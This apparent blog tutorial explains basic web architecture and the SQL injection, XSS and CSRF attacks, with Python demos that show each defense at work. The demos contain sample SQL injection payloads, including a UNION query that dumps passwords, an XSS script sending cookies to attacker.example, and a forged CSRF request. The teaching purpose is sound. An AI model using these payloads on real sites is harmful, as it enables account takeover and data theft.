Introduction to basic web architecture and web attacks (SQL injection, XSS, CSRF)

Table of contents

Web basics

Web server introduction

Web attack

SQL injection attack - attack on website database

XSS cross-site scripting attack - an attack on the user's browser

CSRF cross-site request forgery attack - an attack on the user's browser

The difference between the three attack methods


Web basics

What is the Web

The Web refers to the World Wide Web, also written www: a system of many interconnected hypertext documents, accessed over the Internet.

We usually "surf the Internet" by using a browser to access the Web.

The composition of the Web

The Web is mainly composed of three parts: the client (browser), the server (where the script engine runs), and the database.

The client (browser) is called the front end; the server and the database are called the back end.

The development history of the Web

Web 1.0: in the early stage of the World Wide Web, sites consisted largely of static pages that users could only read, not add to or modify (for example, personal homepages).

Web 2.0: users can add and modify content on web pages (for example, writing blogs and interacting with other users).

Security risks in Web1.0

Mainly SQL injection and file upload vulnerabilities, which primarily harm the web server itself.

Security risks in Web2.0

Web 2.0 brings more and more security risks. Common ones include XSS, CSRF, data hijacking, etc.

Attacks increasingly target the web user rather than just the server.


Web server introduction

Development of web server

The web server has evolved together with the Web itself.

The static page era of the Web

The server simply serves static files (HTML pages, images and other files) for clients to fetch.

Dynamic pages of the Web period 1

The server provides dynamic pages, driven by server-side scripts (for example PHP files). The browser cannot execute server-side scripts such as PHP; it can only render HTML and run client-side JavaScript.

Therefore the PHP script has to be run by the server-side language interpreter, which produces an HTML document that is then sent to the browser for display (the URL the browser sees ends in .php, but the content it receives is HTML).

Dynamic page period of the Web 2

Once a site's content and traffic grow, the web server needs a database service to store and supply its data.

When we perform an action on a page, the PHP script is parsed and executed by the server-side language interpreter; it reads from or writes to the database, and the database returns the corresponding data.

That data passes back through the language interpreter, is assembled into an HTML document, and is then sent to the browser.

The language interpreter generally runs on the same server as the web server, and the two are connected through configuration files.

The script likewise connects to the database service through configuration settings (host, user name, password) to perform its database operations.

The web server, language interpreter and database service together constitute the typical web server / back-end architecture.

Web workflow

How it works from the client (browser) perspective: this is the HTTP/HTTPS request and response exchange.

See the related post: Explanation of HTTP, HTTPS, SSL protocols and related messages (CSDN Blog).

What are the currently popular web back-end architectures?

These architectures are not fixed; the components (web server, language interpreter, database) can be combined very flexibly. The next section walks through one common combination.

How to build a simple Web server environment with Windows+Apache+PHP+MySQL

Using the integrated package phpStudy you can set up a simple web server environment. After installation, the Apache and MySQL services are installed automatically (the MySQL user name and password are both root by default; change that password before letting anyone else reach the server).

After the installation is complete, where are the web page (.php) files?

They are stored in the WWW directory under the software installation directory.

The content displayed when the default web page is opened is the content of the default page file in that directory.

Create your own web page

We can write our own HTML/PHP file and put it in this WWW directory. When we then request that path on the site, this page is served.

For example: if we create a 123.html file in the www directory and open 127.0.0.1/123.html in the browser, the content of 123.html is displayed.


Web attack

For the standard list of the most critical web application security risks, see the OWASP Top 10.

SQL injection attack - attack on website database

Why does SQL injection occur?

Let's first look at how a URL is composed: https://kaifa.baidu.com/searchPage?wd=cdn&hmsr=aladdin. The part after the ? is the query string; it carries the variables that the user can supply (here wd=cdn and hmsr=aladdin), and the server uses these variables to fetch different data from the database.

How to implement SQL injection

SQL injection arises when programmers writing the server-side code fail to validate user-supplied data before using it in a database query, leaving a security hole in the application.

The attacker inserts SQL syntax into the data he submits. When the request reaches the server, the server builds the query from that data and asks the database to execute it, then returns the result to the attacker, who can thereby read data he should not see or perform other database operations.

That is: through a web form, a GET/POST parameter or another page request, the attacker inserts SQL fragments into an input field or the query string, changing the meaning of the original query and ultimately causing the web server (via the database) to execute commands of the attacker's choosing.

Dangers of SQL injection

Database information collection

Add, delete, and modify operations on the database

Control the operating system with the help of certain database features (such as SQL Server's built-in stored procedure xp_cmdshell)

SQL injection defense

Restrict every piece of user-controlled input: the parameter part of the submitted URL, data read back from cookies (and never put important data in them), and data passed in from other systems. In other words, any input a user can touch must be validated before it is used.

Deploy an anti-SQL-injection system or script (for example a web application firewall).

Specific restriction methods:

Whitelist: restrict the format of the data passed in (for example, an id must be digits only), and use parameterised (prepared) queries so that input values are never interpreted as SQL.

Blacklist: filter special keywords (update, delete, etc.) and special characters. This is the weaker approach, because attackers routinely bypass keyword lists.
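As an added example (not code from the original post; the page's own stack is PHP/MySQL, but Python's built-in sqlite3 is used here so it runs offline), the following shows how an injected quote changes the meaning of the login query described above, why the keyword blacklist is easy to bypass, and the two defenses that hold: parameterised queries for values and a whitelist for identifiers such as column names. The table, rows and payloads are all constructed for the demo.

```python
import sqlite3


def make_db():
    # Constructed in-memory database standing in for the site's MySQL backend.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('admin', 'S3cret!', 'admin'),
            ('alice', 'alicepw', 'user');
    """)
    return conn


def login_vulnerable(conn, username, password):
    # User input is pasted into the SQL text, so a quote in the input closes
    # the string literal and everything after it is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Parameterised query: the values travel separately from the SQL text and
    # are only ever treated as data, whatever characters they contain.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


BLACKLIST = ("update", "delete", "drop", "insert")


def blacklist_passes(value):
    # The keyword blacklist from the text. It blocks only what it lists.
    return not any(word in value.lower() for word in BLACKLIST)


ALLOWED_SORT_COLUMNS = {"id", "username", "role"}


def list_users_sorted(conn, sort_column):
    # A column name cannot be bound as a parameter, so for identifiers the
    # whitelist is the right control: anything outside the set is rejected.
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError("invalid sort column: %r" % sort_column)
    rows = conn.execute("SELECT username FROM users ORDER BY " + sort_column).fetchall()
    return [r[0] for r in rows]


# Constructed payloads.
COMMENT_OUT = "admin' --"     # closes the literal and comments out the password check
ALWAYS_TRUE = "' OR '1'='1"   # as the password: makes the WHERE clause true for every row
UNION_DUMP = "x' UNION SELECT password FROM users WHERE username = 'admin' --"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, comment-out :", login_vulnerable(conn, COMMENT_OUT, "wrong"))
    print("vulnerable, always-true :", login_vulnerable(conn, "", ALWAYS_TRUE))
    print("vulnerable, union dump  :", login_vulnerable(conn, UNION_DUMP, "x"))
    print("blacklist stops dump?   :", not blacklist_passes(UNION_DUMP))
    print("parameterised, comment  :", login_safe(conn, COMMENT_OUT, "wrong"))
    print("parameterised, real     :", login_safe(conn, "admin", "S3cret!"))
    print("sorted by username      :", list_users_sorted(conn, "username"))
```

The UNION payload contains none of the blacklisted words, so the blacklist lets it through and it returns the admin password from the vulnerable handler; the same payload is just a non-matching username to the parameterised handler. The ORDER BY whitelist is the complement: when a fragment of user input must become part of the SQL text, limit it to a fixed set of known-good values.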

XSS cross-site scripting attack - an attack on the user's browser

XSS principle

The attacker submits malicious HTML/JavaScript to a website with an XSS vulnerability (the programmer does not filter or encode the data submitted by users). When other users browse the site, that code is delivered as part of the page and executes in their browsers, achieving the attacker's goal (for example: stealing users' cookies, defacing the page structure, redirecting to other websites, etc.).

For example: website A has a message board, and the programmer does not filter or encode the data submitted by users. The attacker writes malicious HTML code and submits it through the message board. Later, whenever a user opens the message board, the malicious code executes automatically in that user's browser.

Classification of XSS

Reflected XSS attack (non-persistent)

The attacker induces the user to visit a URL containing the malicious code; the server echoes the code back into the page, and it executes when the user opens the link (the payload is not stored on the server).

Stored XSS attack (persistence)

The malicious code is stored on the web server or in the database via a submission (a comment, a profile field, etc.), and executes whenever a user opens the page that displays it.

Defense methods

Deploy security equipment such as a web application firewall to filter web content.

Validate user input in the program and, more importantly, encode user-supplied data at the point where it is written into the page (HTML-encode <, >, &, " and ') so the browser treats it as text rather than markup.

Mark session cookies HttpOnly so that JavaScript cannot read their value.
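As an added example (not code from the original post; written in Python so it runs offline, while the page's site would do the same in PHP), the following renders the message board from the stored XSS scenario above with and without output encoding, shows the reflected variant from a query string, and builds the HttpOnly session cookie header the last defense calls for. The messages, the payloads and the session id are constructed for the demo.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

# Constructed message-board rows: the second one is the attacker's submission.
MESSAGES = [
    "Hello, nice site!",
    "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>",
]


def render_board_vulnerable(messages):
    # Message text is concatenated into the page unchanged, so the <script>
    # tag in the second message is delivered to every visitor's browser.
    return "<ul>" + "".join("<li>%s</li>" % m for m in messages) + "</ul>"


def render_board_safe(messages):
    # Encode each message for the HTML-body context: < becomes &lt; etc.,
    # so the browser displays the text instead of executing it.
    return "<ul>" + "".join("<li>%s</li>" % html.escape(m) for m in messages) + "</ul>"


def render_search_reflected(query_string, safe=True):
    # Reflected variant: the search term from the URL is echoed into the page.
    # Nothing is stored; the payload lives in the link the victim was sent.
    params = parse_qs(query_string)
    term = params.get("q", [""])[0]
    shown = html.escape(term) if safe else term
    return "<p>Results for: %s</p>" % shown


def session_cookie_header(session_id):
    # HttpOnly stops document.cookie from reading the session id, so even a
    # successful XSS cannot exfiltrate it this way. Secure limits the cookie
    # to HTTPS; SameSite=Lax also limits when it is sent cross-site.
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Lax"
    return c.output(header="Set-Cookie:")


if __name__ == "__main__":
    # Constructed reflected payload as it would appear URL-encoded in a link.
    link_qs = "q=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E"
    print(render_board_vulnerable(MESSAGES))
    print(render_board_safe(MESSAGES))
    print(render_search_reflected(link_qs, safe=False))
    print(render_search_reflected(link_qs))
    print(session_cookie_header("abc123"))
```

Encoding is applied at output time and is specific to the context the data lands in: html.escape is correct for HTML element content and attribute values, but data placed inside a JavaScript block or a URL needs the encoding for that context instead. HttpOnly does not stop the script from running; it only denies it the cookie value, which is why output encoding remains the primary defense.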

CSRF cross-site request forgery attack - an attack on the user's browser

The attacker gets the victim's browser to send a request to website A that the victim never intended. The attacker does not need the victim's credentials: the browser automatically attaches A's cookies to any request for A, so the forged request arrives at the server looking like a normal request from the logged-in user (XSS can be used to launch CSRF, but CSRF does not depend on it).

For a CSRF attack to succeed, the following must happen:

The user logs in to trusted website A, and the browser stores A's session cookie locally.

Without logging out of A, the user visits dangerous website B. B's page contains an element whose target is a URL on A (for example an image tag or an auto-submitting form); the browser sends that request to A and attaches A's cookie automatically, with no click required.

At this point, A processes the request as if the user had made it, so the attacker acts on A as the user.

Protective measures

The root cause is that the server does not verify that the request was intentionally initiated by the user. It can be protected through the following methods:

Application-level checks (which is also what anti-CSRF security products implement): verify the HTTP Origin/Referer header, add an unpredictable token to each form or request URL and check it on the server, set the SameSite attribute on the session cookie, and never perform state-changing actions in response to GET requests.

When you finish using a website, do not simply close the browser; log out first so the session cookie is invalidated.
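As an added example (not code from the original post; Python rather than the page's PHP, and a model of the request rather than a live server, so it runs offline), the following walks through the attack sequence above: a forged transfer request carrying the victim's session cookie succeeds against a handler that checks only the cookie, and is rejected by one that also checks the request origin and a per-session token. The site origin bank.example, the session store, the balances and the request contents are all constructed for the demo.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://bank.example"   # assumed origin of trusted site A


def new_state():
    # Constructed server state: one logged-in session plus account balances.
    return {
        "sessions": {"sess-alice": {"user": "alice",
                                    "csrf_token": secrets.token_hex(16)}},
        "balances": {"alice": 100, "bob": 0, "mallory": 0},
    }


class Request:
    """What the server sees: the cookies the browser attached automatically,
    the submitted form fields, and the request headers."""

    def __init__(self, cookies, form, headers=None):
        self.cookies = cookies
        self.form = form
        self.headers = headers or {}


def do_transfer(state, src, dst, amount):
    state["balances"][src] -= amount
    state["balances"][dst] = state["balances"].get(dst, 0) + amount


def transfer_vulnerable(state, req):
    # Checks only that a valid session cookie is present. The browser sends
    # that cookie with every request to site A, including one triggered by a
    # form or image tag on site B, so the forged request is accepted.
    session = state["sessions"].get(req.cookies.get("session"))
    if session is None:
        return 401
    do_transfer(state, session["user"], req.form["to"], int(req.form["amount"]))
    return 200


def request_origin(headers):
    # Derive scheme://host from Origin (preferred) or Referer; None if absent.
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return None
    parts = urlsplit(value)
    return "%s://%s" % (parts.scheme, parts.netloc)


def transfer_protected(state, req):
    session = state["sessions"].get(req.cookies.get("session"))
    if session is None:
        return 401
    # 1. Origin/Referer check. A cross-site request carries site B's origin
    #    (or none at all); compare the whole origin, never just a prefix.
    if request_origin(req.headers) != SITE_ORIGIN:
        return 403
    # 2. Synchroniser token. The token is embedded in site A's own form, which
    #    a page on site B cannot read, so B cannot supply the right value.
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf_token"]):
        return 403
    do_transfer(state, session["user"], req.form["to"], int(req.form["amount"]))
    return 200


if __name__ == "__main__":
    # Forged request: site B's page auto-submits a form to A, and the browser
    # attaches alice's session cookie. Note the Origin is B's, not A's.
    forged = Request({"session": "sess-alice"},
                     {"to": "mallory", "amount": "100"},
                     {"Origin": "https://evil.example"})
    state = new_state()
    print("vulnerable handler:", transfer_vulnerable(state, forged), state["balances"])
    state = new_state()
    print("protected handler :", transfer_protected(state, forged), state["balances"])
```

The two checks are deliberately independent: the token alone is sufficient when every state-changing form carries it, and the origin check catches requests that reach the handler by a route that forgot the token. Both assume the action is only reachable by POST; an image tag on site B issues a GET with no form body at all, which is why the text says state-changing actions must not be performed on GET.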

The difference between the three attack methods

They are distinguished mainly by the target and purpose of the attack.

SQL injection: targets the server's database, to read or alter sensitive information.

XSS: targets the user's browser, making it execute the attacker's script and steal information.

CSRF: targets the user's browser too, but forges the victim's identity towards the server, so the attacker can do whatever the victim is allowed to do.


Source: blog.csdn.net/m0_49864110/article/details/135023681